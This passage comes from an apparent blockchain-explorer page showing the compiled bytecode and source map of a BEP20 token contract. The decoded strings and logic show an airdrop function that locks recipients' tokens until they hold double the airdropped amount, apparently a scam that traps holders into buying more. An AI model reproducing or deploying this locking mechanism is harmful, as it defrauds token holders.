06060016040528060248152602001611531602491396001600160a01b038816600090815260066020526040812090610639610c95565b5050565b6001600160a01b0381166111e15760405162461bcd60e51b81526004018080602001828103825260268152602001806113b26026913960400191505060405180910390fd5b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0382166112815760405162461bcd60e51b81526004018080602001828103825260218152602001806114ee6021913960400191505060405180910390fd5b6112c48160405180606001604052806022815260200161150f602291396001600160a01b038516600090815260056020526040902054919063ffffffff610f6c16565b6001600160a01b0383166000908152600560205260409020556007546112f0908263ffffffff61132616565b6007556040805182815290516000916001600160a01b038516916000805160206114868339815191529181900360200190a35050565b600061105d83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610f6c56fe42455032303a207472616e736665722066726f6d20746865207a65726f206164647265737342455032303a20617070726f76652066726f6d20746865207a65726f20616464726573734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737342455032303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365546f20756e6c6f636b20796f75722077616c6c65742c20796f75206861766520746f20646f75626c65207468652061697264726f7070656420616d6f756e742e4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657242455032303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef42455032303a207472616e7366657220746f20746865207a65726f206164647265737342455032303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f42455032303a206275726e2066726f6d20746865207a65726f206164647265737342455032303a206275726e20616d6f756e7420657863656564732062616c616e636542455032303a206275726e20616d6f756e74206578636565647320616c6c6f77616e636542455032303a20617070726f766520746f20746865207a65726f2061646472657373a265627a7a7231582022877d8f2afe15bc19731e961fdc4552757631ad19ca61b0be08882ddfe11ea764736f6c63430005100032

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061014d5760003560e01c80638da5cb5b116100c3578063c204642c1161007c578063c204642c146103eb578063cbf9fe5f1461045b578063dd62ed3e14610481578063deb06ea4146104af578063df2efc85146104dd578063f2fde38b146105035761014d565b80638da5cb5b146103395780639022c19c1461035d57806395d89b4114610383578063a457c2d71461038b578063a9059cbb146103b7578063b76b70b8146103e35761014d565b8063313ce56711610115578063313ce56714610267578063395093511461028557806340c10f19146102b157806370a08231146102dd578063715018a61461030357806379cc67901461030d5761014d565b806306fdde0314610152578063095ea7b3146101cf57806318160ddd1461020f57806323b872dd1461022957806330d6cb3c1461025f575b600080fd5b61015a610529565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561019457818101518382015260200161017c565b50505050905090810190601f1680156101c15780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101fb600480360360408110156101e557600080fd5b506001600160a01b0381351690602001356105bf565b604080519115158252519081900360200190f35b6102176105dc565b60408051918252519081900360200190f35b6101fb6004803603606081101561023f57600080fd5b506001600160a01b038135811691602081013590911690604001356105e2565b61021761066f565b61026f610675565b6040805160ff9092168252519081900360200190f35b6101fb6004803603604081101561029b57600080fd5b506001600160a01b03813516906020013561067e565b6101fb600480360360408110156102c757600080fd5b506001600160a01b0381351690602001356106d2565b610217600480360360208110156102f357600080fd5b50356001600160a01b0316610758565b61030b610773565b005b6101fb6004803603604081101561032357600080fd5b506001600160a01b038135169060200135610815565b610341610821565b604080516001600160a01b039092168252519081900360200190f35b6101fb6004803603602081101561037357600080fd5b50356001600160a01b0316610830565b61015a610845565b6101fb600480360360408110156103a157600080fd5b506001600160a01b0381351690602001356108a6565b6101fb600480360360408110156103cd57600080fd5b506001600160a01b038135169060200135610914565b610341610928565b6101fb6004803603604081101561040157600080fd5b81019060208101813564010000000081111561041c57600080fd5b82018360208201111561042e57600080fd5b8035906020019184602083028401116401000000008311171561045057600080fd5b919350915035610937565b6101fb6004803603602081101561047157600080fd5b50356001600160a01b0316610aaf565b6102176004803603604081101561049757600080fd5b506001600160a01b0381358116916020013516610ac4565b6101fb600480360360408110156104c557600080fd5b506001600160a01b0381351690602001351515610aef565b6101fb600480360360208110156104f357600080fd5b50356001600160a01b0316610bb2565b61030b6004803603602081101561051957600080fd5b50356001600160a01b0316610c31565b600a8054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156105b55780601f1061058a576101008083540402835291602001916105b5565b820191906000526020600020905b81548152906001019060200180831161059857829003601f168201915b5050505050905090565b60006105d36105cc610c95565b8484610c99565b50600192915050565b60075490565b60006105ef848484610d85565b610665846105fb610c95565b610660856040518060600160405280602881526020016113d8602891396001600160a01b038a16600090815260066020526040812090610639610c95565b6001600160a01b03168152602081019190915260400160002054919063ffffffff610f6c16565b610c99565b5060019392505050565b60035481565b60085460ff1690565b60006105d361068b610c95565b84610660856006600061069c610c95565b6001600160a01b03908116825260208083019390935260409182016000908120918c16815292529020549063ffffffff61100316565b6000600160006106e0610c95565b6001600160a01b0316815260208101919091526040016000205460ff1661074e576040805162461bcd60e51b815260206004820152601960248201527f43616c6c6572206973206e6f7420746865206761746577617900000000000000604482015290519081900360640190fd5b6105d38383611064565b6001600160a01b031660009081526005602052604090205490565b61077b610c95565b6000546001600160a01b039081169116146107cb576040805162461bcd60e51b81526020600482018190526024820152600080516020611440833981519152604482015290519081900360640190fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b60006105d38383611144565b6000546001600160a01b031690565b60016020526000908152604090205460ff1681565b60098054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156105b55780601f1061058a576101008083540402835291602001916105b5565b60006105d36108b3610c95565b84610660856040518060600160405280602581526020016114c960259139600660006108dd610c95565b6001600160a01b03908116825260208083019390935260409182016000908120918d1681529252902054919063ffffffff610f6c16565b60006105d3610921610c95565b8484610d85565b6002546001600160a01b031681565b6002546000906001600160a01b0316331461098d576040805162461bcd60e51b81526020600482015260116024820152702737ba1030b4b9323937b81036b0b5b2b960791b604482015290519081900360640190fd5b60408051606081019091526026808252849133916109d7918685029161146060208301396001600160a01b038416600090815260056020526040902054919063ffffffff610f6c16565b6001600160a01b0382166000908152600560205260409020555b8115610a9e57600019909101906000868684818110610a0c57fe5b602090810292909201356001600160a01b031660008181526004845260408082208054600160ff1990911617905560059094529290922054919250610a5391905086611003565b6001600160a01b03808316600081815260056020908152604091829020949094558051898152905191939286169260008051602061148683398151915292918290030190a3506109f1565b505050600202600355506001919050565b60046020526000908152604090205460ff1681565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6000610af9610c95565b6000546001600160a01b03908116911614610b49576040805162461bcd60e51b81526020600482018190526024820152600080516020611440833981519152604482015290519081900360640190fd5b6001600160a01b038316600081815260016020908152604091829020805460ff191686151590811790915582519384529083015280517f25534777c807048646dcdb9b9c7c447c9b13f5374557a5182baec147da8d37839281900390910190a150600192915050565b6000610bbc610c95565b6000546001600160a01b03908116911614610c0c576040805162461bcd60e51b81526020600482018190526024820152600080516020611440833981519152604482015290519081900360640190fd5b50600280546001600160a01b0383166001600160a01b03199091161790556001919050565b610c39610c95565b6000546001600160a01b03908116911614610c89576040805162461bcd60e51b81526020600482018190526024820152600080516020611440833981519152604482015290519081900360640190fd5b610c928161119c565b50565b3390565b6001600160a01b038316610cde5760405162461bcd60e51b815260040180806020018281038252602481526020018061138e6024913960400191505060405180910390fd5b6001600160a01b038216610d235760405162461bcd60e51b81526004018080602001828103825260228152602001806115556022913960400191505060405180910390fd5b6001600160a01b03808416600081815260066020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b038316610dca5760405162461bcd60e51b81526004018080602001828103825260258152602001806113696025913960400191505060405180910390fd5b6001600160a01b038216610e0f5760405162461bcd60e51b81526004018080602001828103825260238152602001806114a66023913960400191505060405180910390fd5b6001600160a01b03831660009081526004602052604090205460ff1615610eaa576003546001600160a01b0384166000908152600560205260409020541015610e895760405162461bcd60e51b81526004018080602001828103825260408152602001806114006040913960400191505060405180910390fd5b6001600160a01b0383166000908152600460205260409020805460ff191690555b610eed81604051806060016040528060268152602001611460602691396001600160a01b038616600090815260056020526040902054919063ffffffff610f6c16565b6001600160a01b038085166000908152600560205260408082209390935590841681522054610f22908263ffffffff61100316565b6001600160a01b03808416600081815260056020908152604091829020949094558051858152905191939287169260008051602061148683398151915292918290030190a3505050565b60008184841115610ffb5760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610fc0578181015183820152602001610fa8565b50505050905090810190601f168015610fed5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b60008282018381101561105d576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b6001600160a01b0382166110bf576040805162461bcd60e51b815260206004820152601f60248201527f42455032303a206d696e7420746f20746865207a65726f206164647265737300604482015290519081900360640190fd5b6007546110d2908263ffffffff61100316565b6007556001600160a01b0382166000908152600560205260409020546110fe908263ffffffff61100316565b6001600160a01b03831660008181526005602090815260408083209490945583518581529351929391926000805160206114868339815191529281900390910190a35050565b61114e828261123c565b6111988261115a610c95565b61066084604051806060016040528060248152602001611531602491396001600160a01b038816600090815260066020526040812090610639610c95565b5050565b6001600160a01b0381166111e15760405162461bcd60e51b81526004018080602001828103825260268152602001806113b26026913960400191505060405180910390fd5b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0382166112815760405162461bcd60e51b81526004018080602001828103825260218152602001806114ee6021913960400191505060405180910390fd5b6112c48160405180606001604052806022815260200161150f602291396001600160a01b038516600090815260056020526040902054919063ffffffff610f6c16565b6001600160a01b0383166000908152600560205260409020556007546112f0908263ffffffff61132616565b6007556040805182815290516000916001600160a01b038516916000805160206114868339815191529181900360200190a35050565b600061105d83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610f6c56fe42455032303a207472616e736665722066726f6d20746865207a65726f206164647265737342455032303a20617070726f76652066726f6d20746865207a65726f20616464726573734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737342455032303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365546f20756e6c6f636b20796f75722077616c6c65742c20796f75206861766520746f20646f75626c65207468652061697264726f7070656420616d6f756e742e4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657242455032303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef42455032303a207472616e7366657220746f20746865207a65726f206164647265737342455032303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f42455032303a206275726e2066726f6d20746865207a65726f206164647265737342455032303a206275726e20616d6f756e7420657863656564732062616c616e636542455032303a206275726e20616d6f756e74206578636565647320616c6c6f77616e636542455032303a20617070726f766520746f20746865207a65726f2061646472657373a265627a7a7231582022877d8f2afe15bc19731e961fdc4552757631ad19ca61b0be08882ddfe11ea764736f6c63430005100032

Deployed Bytecode Sourcemap

11196:9371:0:-;;;;8:9:-1;5:2;;;30:1;27;20:12;5:2;11196:9371:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13396:79;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8:100:-1;33:3;30:1;27:10;8:100;;;90:11;;;84:18;71:11;;;64:39;52:2;45:10;8:100;;;12:14;13396:79:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14502:144;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;14502:144:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;13531:87;;;:::i;:::-;;;;;;;;;;;;;;;;15091:292;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;15091:292:0;;;;;;;;;;;;;;;;;:::i;11424:28::-;;;:::i;13124:79::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;15765:200;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;15765:200:0;;;;;;;;:::i;16888:124::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;16888:124:0;;;;;;;;:::i;13672:106::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;13672:106:0;-1:-1:-1;;;;;13672:106:0;;:::i;10498:130::-;;;:::i;:::-;;20433:131;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;20433:131:0;;;;;;;;:::i;9896:73::-;;;:::i;:::-;;;;-1:-1:-1;;;;;9896:73:0;;;;;;;;;;;;;;11282:40;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;11282:40:0;-1:-1:-1;;;;;11282:40:0;;:::i;13260:83::-;;;:::i;16437:251::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;16437:251:0;;;;;;;;:::i;13972:216::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;13972:216:0;;;;;;;;:::i;11391:28::-;;;:::i;12445:618::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;12445:618:0;;;;;;;;21:11:-1;5:28;;2:2;;;46:1;43;36:12;2:2;12445:618:0;;35:9:-1;28:4;12:14;8:25;5:40;2:2;;;58:1;55;48:12;2:2;12445:618:0;;;;;;101:9:-1;95:2;81:12;77:21;67:8;63:36;60:51;39:11;25:12;22:29;11:108;8:2;;;132:1;129;122:12;8:2;12445:618:0;;-1:-1:-1;12445:618:0;-1:-1:-1;12445:618:0;;:::i;11461:39::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;11461:39:0;-1:-1:-1;;;;;11461:39:0;;:::i;14242:130::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;14242:130:0;;;;;;;;;;:::i;12121:185::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;;;;;;12121:185:0;;;;;;;;;;:::i;12312:125::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;12312:125:0;-1:-1:-1;;;;;12312:125:0;;:::i;10773:103::-;;;;;;13:2:-1;8:3;5:11;2:2;;;29:1;26;19:12;2:2;-1:-1;10773:103:0;-1:-1:-1;;;;;10773:103:0;;:::i;13396:79::-;13464:5;13457:12;;;;;;;;-1:-1:-1;;13457:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13435:13;;13457:12;;13464:5;;13457:12;;13464:5;13457:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13396:79;:::o;14502:144::-;14570:4;14583:39;14592:12;:10;:12::i;:::-;14606:7;14615:6;14583:8;:39::i;:::-;-1:-1:-1;14636:4:0;14502:144;;;;:::o;13531:87::-;13600:12;;13531:87;:::o;15091:292::-;15182:4;15195:36;15205:6;15213:9;15224:6;15195:9;:36::i;:::-;15238:121;15247:6;15255:12;:10;:12::i;:::-;15269:89;15307:6;15269:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15269:19:0;;;;;;:11;:19;;;;;;15289:12;:10;:12::i;:::-;-1:-1:-1;;;;;15269:33:0;;;;;;;;;;;;-1:-1:-1;15269:33:0;;;:89;;:37;:89;:::i;:::-;15238:8;:121::i;:::-;-1:-1:-1;15373:4:0;15091:292;;;;;:::o;11424:28::-;;;;:::o;13124:79::-;13188:9;;;;13124:79;:::o;15765:200::-;15845:4;15858:83;15867:12;:10;:12::i;:::-;15881:7;15890:50;15929:10;15890:11;:25;15902:12;:10;:12::i;:::-;-1:-1:-1;;;;;15890:25:0;;;;;;;;;;;;;;;;;-1:-1:-1;15890:25:0;;;:34;;;;;;;;;;;:50;:38;:50;:::i;16888:124::-;16958:4;11924:8;:22;11933:12;:10;:12::i;:::-;-1:-1:-1;;;;;11924:22:0;;;;;;;;;;;;-1:-1:-1;11924:22:0;;;;11916:60;;;;;-1:-1:-1;;;11916:60:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;16971:17;16977:2;16981:6;16971:5;:17::i;13672:106::-;-1:-1:-1;;;;;13754:18:0;13731:7;13754:18;;;:9;:18;;;;;;;13672:106::o;10498:130::-;10100:12;:10;:12::i;:::-;10090:6;;-1:-1:-1;;;;;10090:6:0;;;:22;;;10082:67;;;;;-1:-1:-1;;;10082:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;10082:67:0;;;;;;;;;;;;;;;10593:1;10577:6;;10556:40;;-1:-1:-1;;;;;10577:6:0;;;;10556:40;;10593:1;;10556:40;10620:1;10603:19;;-1:-1:-1;;;;;;10603:19:0;;;10498:130::o;20433:131::-;20501:4;20514:26;20524:7;20533:6;20514:9;:26::i;9896:73::-;9934:7;9957:6;-1:-1:-1;;;;;9957:6:0;9896:73;:::o;11282:40::-;;;;;;;;;;;;;;;:::o;13260:83::-;13330:7;13323:14;;;;;;;;-1:-1:-1;;13323:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13301:13;;13323:14;;13330:7;;13323:14;;13330:7;13323:14;;;;;;;;;;;;;;;;;;;;;;;;16437:251;16522:4;16535:129;16544:12;:10;:12::i;:::-;16558:7;16567:96;16606:15;16567:96;;;;;;;;;;;;;;;;;:11;:25;16579:12;:10;:12::i;:::-;-1:-1:-1;;;;;16567:25:0;;;;;;;;;;;;;;;;;-1:-1:-1;16567:25:0;;;:34;;;;;;;;;;;:96;;:38;:96;:::i;13972:216::-;14043:4;14122:42;14132:12;:10;:12::i;:::-;14146:9;14157:6;14122:9;:42::i;11391:28::-;;;-1:-1:-1;;;;;11391:28:0;;:::o;12445:618::-;12561:13;;12526:4;;-1:-1:-1;;;;;12561:13:0;12547:10;:27;12539:57;;;;;-1:-1:-1;;;12539:57:0;;;;;;;;;;;;-1:-1:-1;;;12539:57:0;;;;;;;;;;;;;;;12695:75;;;;;;;;;;;;;12617:10;;12658;;12695:75;;12717:10;;;;12695:75;;;;;-1:-1:-1;;;;;12695:17:0;;;;;;:9;:17;;;;;;;:75;;:21;:75;:::i;:::-;-1:-1:-1;;;;;12675:17:0;;;;;;:9;:17;;;;;:95;12779:228;12786:7;;12779:228;;-1:-1:-1;;12804:5:0;;;;12818:17;12838:10;;12804:5;12838:15;;;;;;;;;;;;;;;;-1:-1:-1;;;;;12838:15:0;12862:17;;;;:6;:17;;;;;;:24;;12882:4;-1:-1:-1;;12862:24:0;;;;;;12918:9;:20;;;;;;;;12838:15;;-1:-1:-1;12918:32:0;;:20;-1:-1:-1;12943:6:0;12918:24;:32::i;:::-;-1:-1:-1;;;;;12895:20:0;;;;;;;:9;:20;;;;;;;;;:55;;;;12964:35;;;;;;;12895:20;;12964:35;;;;-1:-1:-1;;;;;;;;;;;12964:35:0;;;;;;;;12779:228;;;;-1:-1:-1;;;13038:1:0;13029:10;13013:13;:26;-1:-1:-1;13053:4:0;;12445:618;-1:-1:-1;12445:618:0:o;11461:39::-;;;;;;;;;;;;;;;:::o;14242:130::-;-1:-1:-1;;;;;14339:18:0;;;14316:7;14339:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;14242:130::o;12121:185::-;12201:4;10100:12;:10;:12::i;:::-;10090:6;;-1:-1:-1;;;;;10090:6:0;;;:22;;;10082:67;;;;;-1:-1:-1;;;10082:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;10082:67:0;;;;;;;;;;;;;;;-1:-1:-1;;;;;12214:17:0;;;;;;:8;:17;;;;;;;;;:26;;-1:-1:-1;;12214:26:0;;;;;;;;;;12252:30;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;12296:4:0;12121:185;;;;:::o;12312:125::-;12379:4;10100:12;:10;:12::i;:::-;10090:6;;-1:-1:-1;;;;;10090:6:0;;;:22;;;10082:67;;;;;-1:-1:-1;;;10082:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;10082:67:0;;;;;;;;;;;;;;;-1:-1:-1;12392:13:0;:21;;-1:-1:-1;;;;;12392:21:0;;-1:-1:-1;;;;;;12392:21:0;;;;;;;12312:125;;;:::o;10773:103::-;10100:12;:10;:12::i;:::-;10090:6;;-1:-1:-1;;;;;10090:6:0;;;:22;;;10082:67;;;;;-1:-1:-1;;;10082:67:0;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;10082:67:0;;;;;;;;;;;;;;;10842:28;10861:8;10842:18;:28::i;:::-;10773:103;:::o;3591:92::-;3667:10;3591:92;:::o;19713:320::-;-1:-1:-1;;;;;19803:19:0;;19795:68;;;;-1:-1:-1;;;19795:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19878:21:0;;19870:68;;;;-1:-1:-1;;;19870:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19947:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19995:32;;;;;;;;;;;;;;;;;19713:320;;;:::o;17472:640::-;-1:-1:-1;;;;;17566:20:0;;17558:70;;;;-1:-1:-1;;;17558:70:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17643:23:0;;17635:71;;;;-1:-1:-1;;;17635:71:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17717:14:0;;;;;;:6;:14;;;;;;;;17713:183;;;17773:13;;-1:-1:-1;;;;;17752:17:0;;;;;;:9;:17;;;;;;:34;;17744:111;;;;-1:-1:-1;;;17744:111:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17866:14:0;;17883:5;17866:14;;;:6;:14;;;;;:22;;-1:-1:-1;;17866:22:0;;;17713:183;17924:71;17946:6;17924:71;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17924:17:0;;;;;;:9;:17;;;;;;;:71;;:21;:71;:::i;:::-;-1:-1:-1;;;;;17904:17:0;;;;;;;:9;:17;;;;;;:91;;;;18025:20;;;;;;;:32;;18050:6;18025:32;:24;:32;:::i;:::-;-1:-1:-1;;;;;18002:20:0;;;;;;;:9;:20;;;;;;;;;:55;;;;18071:35;;;;;;;18002:20;;18071:35;;;;-1:-1:-1;;;;;;;;;;;18071:35:0;;;;;;;;17472:640;;;:::o;5550:178::-;5636:7;5668:12;5660:6;;;;5652:29;;;;-1:-1:-1;;;5652:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;90:11;;;84:18;71:11;;;64:39;52:2;45:10;8:100;;;12:14;5652:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;5700:5:0;;;5550:178::o;4723:167::-;4781:7;4809:5;;;4829:6;;;;4821:46;;;;;-1:-1:-1;;;4821:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;4883:1;4723:167;-1:-1:-1;;;4723:167:0:o;18373:290::-;-1:-1:-1;;;;;18445:21:0;;18437:65;;;;;-1:-1:-1;;;18437:65:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;18526:12;;:24;;18543:6;18526:24;:16;:24;:::i;:::-;18511:12;:39;-1:-1:-1;;;;;18578:18:0;;;;;;:9;:18;;;;;;:30;;18601:6;18578:30;:22;:30;:::i;:::-;-1:-1:-1;;;;;18557:18:0;;;;;;:9;:18;;;;;;;;:51;;;;18620:37;;;;;;;18557:18;;;;-1:-1:-1;;;;;;;;;;;18620:37:0;;;;;;;;;18373:290;;:::o;20205:222::-;20273:22;20279:7;20288:6;20273:5;:22::i;:::-;20302:119;20311:7;20320:12;:10;:12::i;:::-;20334:86;20373:6;20334:86;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;20334:20:0;;;;;;:11;:20;;;;;;20355:12;:10;:12::i;20302:119::-;20205:222;;:::o;10974:215::-;-1:-1:-1;;;;;11044:22:0;;11036:73;;;;-1:-1:-1;;;11036:73:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11142:6;;;11121:38;;-1:-1:-1;;;;;11121:38:0;;;;11142:6;;;11121:38;;;11166:6;:17;;-1:-1:-1;;;;;;11166:17:0;-1:-1:-1;;;;;11166:17:0;;;;;;;;;;10974:215::o;18971:330::-;-1:-1:-1;;;;;19043:21:0;;19035:67;;;;-1:-1:-1;;;19035:67:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19132:68;19155:6;19132:68;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19132:18:0;;;;;;:9;:18;;;;;;;:68;;:22;:68;:::i;:::-;-1:-1:-1;;;;;19111:18:0;;;;;;:9;:18;;;;;:89;19222:12;;:24;;19239:6;19222:24;:16;:24;:::i;:::-;19207:12;:39;19258:37;;;;;;;;19284:1;;-1:-1:-1;;;;;19258:37:0;;;-1:-1:-1;;;;;;;;;;;19258:37:0;;;;;;;;18971:330;;:::o;5145:130::-;5203:7;5226:43;5230:1;5233;5226:43;;;;;;;;;;;;;;;;;:3;:43::i

Swarm Source

bzzr://22877d8f2afe15bc19731e961fdc4552757631ad19ca61b0be08882ddfe11ea7
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.